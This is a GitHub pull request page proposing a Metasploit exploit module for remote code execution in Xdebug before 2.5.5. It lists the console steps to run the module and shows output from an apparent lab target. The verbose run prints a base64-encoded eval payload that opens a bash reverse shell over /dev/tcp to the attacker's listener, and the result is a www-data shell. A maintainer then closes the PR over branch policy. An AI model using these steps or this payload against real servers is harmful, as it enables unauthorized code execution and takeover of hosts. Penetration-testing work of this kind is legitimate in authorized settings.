Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Xdebug < 2.5.5 Remote Code Execution #9916

Closed
wants to merge 2 commits into from

Conversation

@MinatoTW
Copy link
Contributor

commented Apr 23, 2018

Xdebug is a PHP debugging tool that supports remote debugging of PHP code on the server via source code.
This module exploits the RCE vulnerability and gives a command shell back.

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploits/unix/http/xdebug_rce
  • check
  • set RHOST 10.10.10.83
  • set LHOST 10.10.14.197
  • exploit

Example Outputs

  • Check
msf exploit(unix/http/xdebug_rce) > set RHOST 10.10.10.83
RHOST => 10.10.10.83
msf exploit(unix/http/xdebug_rce) > set LHOST tun0
LHOST => tun0
msf exploit(unix/http/xdebug_rce) > check

[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled

[*] 10.10.10.83:80 The target service is running, but could not be validated.
msf exploit(unix/http/xdebug_rce) > ```



- Run


msf exploit(unix/http/xdebug_rce) > run

[*] Started reverse TCP handler on 10.10.14.197:4444 
[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled

[*] 10.10.10.83:80 - Sending payload...... 
[*] 10.10.10.83:80 - Waiting for client response.....
[*] 10.10.10.83:80 - Received data.....
[*] Command shell session 1 opened (10.10.14.197:4444 -> 10.10.10.83:36628) at 2018-04-23 20:45:41 +0530

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

- Run verbose output

msf exploit(unix/http/xdebug_rce) > set verbose true
verbose => true
msf exploit(unix/http/xdebug_rce) > run

[*] Started reverse TCP handler on 10.10.14.197:4444 
Request send
Date: Mon, 23 Apr 2018 15:16:56 GMT
Server: Apache
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Xdebug: 2.5.5
Content-Length: 314
Content-Type: text/html; charset=UTF-8


[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled

[*] 10.10.10.83:80 - Sending payload...... 
Payload sent-eval -i 1 -- c3lzdGVtKCIgYmFzaCAtYyAnMDwmMTkyLTtleGVjIDE5Mjw+L2Rldi90Y3AvMTAuMTAuMTQuMTk3LzQ0NDQ7c2ggPCYxOTIgPiYxOTIgMj4mMTkyJyIp
[*] 10.10.10.83:80 - Waiting for client response.....
[*] 10.10.10.83:80 - Received data.....
490<?xml version="1.0" encoding="iso-8859-1"?>
<init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///var/www/html/index.php" language="PHP" xdebug:language_version="7.1.12" protocol_version="1.0" appid="1179" idekey="jtGjvfApYD"><engine version="2.5.5"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2017 by Derick Rethans]]></copyright></init>
[*] Command shell session 2 opened (10.10.14.197:4444 -> 10.10.10.83:36676) at 2018-04-23 20:46:56 +0530

id

uid=33(www-data) gid=33(www-data) groups=33(www-data)```
@jmartin-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 23, 2018

It is required that code in your fork be merged from a unique branch in your repository to master in Rapid7's. Please create a new branch in your fork of framework and resubmit this from that branch.

git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Closing based on the this requirement, please do resubmit from a unique branch.

@jmartin-r7 jmartin-r7 closed this Apr 23, 2018

@MinatoTW

This comment has been minimized.

Copy link
Contributor Author

commented Apr 23, 2018

Moved it @jmartin-r7

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.